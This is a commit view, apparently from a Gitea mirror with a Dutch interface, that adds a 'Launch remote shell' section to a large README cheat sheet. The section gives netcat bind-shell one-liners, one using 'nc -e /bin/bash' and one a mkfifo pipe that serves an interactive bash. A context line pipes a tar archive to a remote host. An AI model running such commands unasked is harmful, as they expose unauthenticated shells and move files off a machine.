Bladeren bron

minor update

pull/114/head
phk918 4 jaren geleden
committed by GitHub
bovenliggende
commit
c8792783ec
Geen bekende sleutel gevonden voor deze handtekening in de database GPG sleutel-ID: 4AEE18F83AFDEB23
1 gewijzigde bestanden met toevoegingen van 5 en 0 verwijderingen
  1. +5
    -0
      README.md

+ 5
- 0
README.md Bestand weergeven

@@ -3235,6 +3235,11 @@ client> tar czvfp - /path/to/dir | nc 10.240.30.3 5000
###### Launch remote shell

```bash
# 1)
server> nc -l 5000 -e /bin/bash
client> nc 10.240.30.3 5000

# 2)
server> rm -f /tmp/f; mkfifo /tmp/f
server> cat /tmp/f | /bin/bash -i 2>&1 | nc -l 127.0.0.1 5000 > /tmp/f
client> nc 10.240.30.3 5000


Laden…
Annuleren
Opslaan